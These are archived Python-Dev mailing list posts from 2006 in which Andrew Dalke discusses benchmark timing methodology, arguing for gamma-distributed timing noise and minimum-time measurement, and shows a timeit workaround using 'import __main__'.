It's the one with the least noise overhead.

I think fitting the smaller data points to a gamma distribution might
yield better (more reproducible and useful) numbers but I know my
stats ability is woefully decayed so I'm not going to try.  My observation
is that the shape factor is usually small so in a few dozen to a hundred
samples there's a decent chance of getting a time with minimal noise
overhead.

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] Python Benchmarks

2006-06-02 Thread Andrew Dalke
On 6/2/06, M.-A. Lemburg <[EMAIL PROTECTED]> wrote:
> It's interesting that even pressing a key on your keyboard
> will cause forced context switches.

When niceness was first added to multiprocessing OSes people found their
CPU intensive jobs would go faster by pressing enter a lot.

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] Python Benchmarks

2006-06-03 Thread Andrew Dalke
Tim:
> A lot of things get mixed up here ;-)  The _mean_ is actually useful
> if you're using a poor-resolution timer with a fast test.

In which case discrete probability distributions are better than my assumption
of a continuous distribution.

I looked at the distribution of times for 1,000 repeats of
    t1 = time.time()
    t2 = time.time()
    times.append(t2 - t1)

The times and counts I found were

9.53674316406e-07 388
1.19209289551e-06 95
1.90734863281e-06 312
2.14576721191e-06 201
2.86102294922e-06 2
1.90734863281e-05 1
3.00407409668e-05 1
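
That table can be rebuilt from the collected deltas like so (a sketch
of the tallying, using the times list from the snippet above):

counts = {}
for t in times:
    counts[t] = counts.get(t, 0) + 1
for t in sorted(counts):
    print t, counts[t]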

This implies my Mac's time.time() has a resolution of 2.384185791015e-07 s
(0.2µs, or about 4.2MHz), or possibly a small integer fraction thereof.  The
timer overhead takes between 4 and 9 ticks.  Ignoring the outliers, and
assuming I have the CPU to myself for the timeslice, I expect about +/- 3
ticks of noise per test.

To measure 1% speedup reliably I'll need to run, what, 300-600 ticks?  That's
a millisecond, and with a time quantum of 10 ms there's a 1 in 10 chance that
I'll incur that overhead.

In other words, I don't think my high-resolution timer is high enough.  Got
a spare Cray I can use, and will you pay for the power bill?

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] Python Benchmarks

2006-06-03 Thread Andrew Dalke
On 6/3/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> - I would average the timings of runs instead of taking the minimum value as
> sometimes bench marks could be running code that is not deterministic in its
> calculations (could be using random numbers that effect convergence).

I would rewrite those to be deterministic.  Any benchmark of mine which
uses random numbers initializes the generator with a fixed seed, and
does it in such a way that the order or choice of subbenchmarks does
not affect the individual results.  Any other way is madness.

> - Before calculating the average number I would throw out samples
> outside 3 sigmas (the outliers).

As I've insisted, talking about sigmas assumes a Gaussian distribution.
It's more likely that the timing variations (at least in stringbench) are
closer to a gamma distribution.

> Here is a passage I found ...
 ...
>   Unfortunately, defining an outlier is subjective (as it should be), and the
>   decisions concerning how to identify them must be made on an individual
>   basis (taking into account specific experimental paradigms

The experimental paradigm I've been using is:

  - a precise and accurate clock on timescales much smaller than the
    benchmark (hence continuous distributions)
  - rare, random, short and uncorrelated interruptions

This leads to a gamma distribution (plus a constant offset for the
minimum compute time).

Gamma distributions have longer tails than Gaussians and hence
more "outliers".  If you think that averaging is useful then throwing
those outliers away will artificially lower the average value.

To me, using the minimum time, given the paradigm, makes sense.
How fast is the fastest runner in the world?  Do you have him run
a dozen times and get the average, or use the shortest time?

> I usually use this approach while reviewing data obtained by fairly
> accurate sensors so being being conservative using 3 sigmas works
> well for these cases.

That uses a different underlying physical process which is better
modeled by Gaussians.

Consider this.  For a given benchmark there is an absolute minimum time
for it to run on a given machine.  Suppose this is 10 seconds and the
benchmark timing comes out 10.2 seconds.  The +0.2 comes from
background overhead, though you don't know exactly what's due to overhead
and what's real.

If the times were Gaussian then there's as much chance of getting
benchmark times of 10.5 seconds as of 9.9 seconds.  But repeat the
benchmark as many times as you want and you'll never see 9.9 seconds,
though you will see 10.5.

> - Another improvement to bench marks can be obtained when both
> the old and new code is available to be benched mark together.

That's what stringbench does, comparing unicode and 8-bit strings.
However, how do you benchmark changes which are more complicated
than that?  For example, benchmark changes to the exception
mechanism, or builds under gcc 3.x and 4.x.

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] PEP 328 and PEP 338, redux

2006-07-01 Thread Andrew Dalke
Giovanni Bajo <[EMAIL PROTECTED]> wrote:
> Real-world usage case for import __main__? Otherwise, I say screw it :)

I have used it as a workaround for timeit.py's requirement that I pass
it strings instead of functions.

>>> def compute():
...     1+1
...
>>> import timeit
>>> t = timeit.Timer("__main__.compute()", "import __main__")
>>> t.timeit()
1.9755008220672607
>>>

You can argue (as many have) that timeit.py needs a better API for
this.  But that's a different world from the existing real one.
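
(For what it's worth, later releases did grow that better API: from
Python 2.6 on, timeit.Timer accepts a callable directly, which removes
the need for the __main__ dance.)

import timeit

def compute():
    1 + 1

t = timeit.Timer(compute)   # callable support, Python 2.6+
print t.timeit()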

Andrew
[EMAIL PROTECTED]